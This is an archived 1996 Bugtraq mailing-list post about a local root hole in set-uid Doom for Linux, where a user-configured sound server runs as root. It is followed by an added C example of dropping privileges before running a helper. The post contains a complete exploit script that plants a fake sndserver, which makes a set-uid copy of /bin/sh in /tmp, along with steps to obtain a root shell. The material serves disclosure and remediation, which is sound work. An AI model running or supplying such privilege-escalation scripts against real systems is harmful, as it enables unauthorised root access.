[3805] in bugtraq
Re: Linux: killmouse/doom
daemon@ATHENA.MIT.EDU (Bo)
Tue Dec 17 14:14:19 1996
Date: Tue, 17 Dec 1996 10:18:24 +0100
Reply-To: Bo <bo@ebony.iaehv.nl>
From: Bo <bo@ebony.iaehv.nl>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
> From: Joe Zbiciak <im14u2c@cegt201.bradley.edu>
> Subject: Re: Linux: exploit for killmouse.
>
> Which reminds me, there's a bigger hole in Doom. It doesn't drop its
> root permissions soon enough! The user is allowed to set a sound server
> in his/her .doomrc. Normally, this is set to "sndserver". However, this
> can be set to *any* program, and that program runs as root!!
Yes, very true. And just in case anybody collects these scripts, here's
the obvious one:
#!/bin/sh
# Tue Dec 17 10:02:20 MET 1996 Bo
echo 'sndserver "/tmp/sndserver"' > .doomrc
cat > /tmp/sndserver.c << EOF
#include <stdio.h>
#include <unistd.h>
main() {
    if (fork()) while (getc(stdin));
    else system("cp /bin/sh /tmp; chmod +s /tmp/sh");
    /* or whatever you like to do */
}
EOF
gcc /tmp/sndserver.c -o /tmp/sndserver
The fork() is just so that doom runs on nicely without locking up the
keyboard and sndserver gobbles up all the sound data sent to it. Run
the script, start sdoom, quit the normal way, and execute /tmp/sh.
Thanks for pointing it out, Joe.
Regards,
Bo.
--
"Heisenberg may have been here".
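
The flaw discussed in this thread is a set-uid-root program starting a user-configured helper before it has given up root. The following C code is an added example, not part of the original post and not Doom's source: it shows the child process dropping privileges permanently, and verifying the drop, before it executes the helper. The function names `drop_privileges` and `run_helper_unprivileged` and the helper path in `main` are assumptions made for illustration.

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Permanently give up set-uid/set-gid privileges. For a set-uid-root binary
 * setgid()/setuid() reset the real, effective and saved IDs together.
 * Returns 0 on success, -1 if the drop failed or could be undone. */
int drop_privileges(void)
{
    uid_t ruid = getuid(), old_euid = geteuid();
    gid_t rgid = getgid(), old_egid = getegid();
    /* Group first: once the UID is dropped we may no longer change it. */
    if (setgid(rgid) != 0 || setuid(ruid) != 0)
        return -1;
    if (geteuid() != ruid || getegid() != rgid)
        return -1;
    /* Regaining the old IDs must now fail, or a saved ID survived. */
    if (old_euid != ruid && setuid(old_euid) == 0)
        return -1;
    if (old_egid != rgid && setgid(old_egid) == 0)
        return -1;
    return 0;
}

/* Run a user-configured helper (hypothetical stand-in for the sound server)
 * only after the child has dropped privileges. Returns the helper's exit
 * status, 127 if it could not be started, -1 on fork/wait errors. */
int run_helper_unprivileged(const char *path, char *const argv[])
{
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_privileges() != 0)
            _exit(126);          /* never exec with leftover privileges */
        execv(path, argv);
        _exit(127);              /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    char *const argv[] = { "id", NULL };   /* constructed sample helper */
    return run_helper_unprivileged("/usr/bin/id", argv);
}
```

Installed set-uid root and run by an ordinary user, the helper reports that user's IDs rather than root's. The example does not sanitize the inherited environment or open file descriptors, which a real set-uid program should also do before exec.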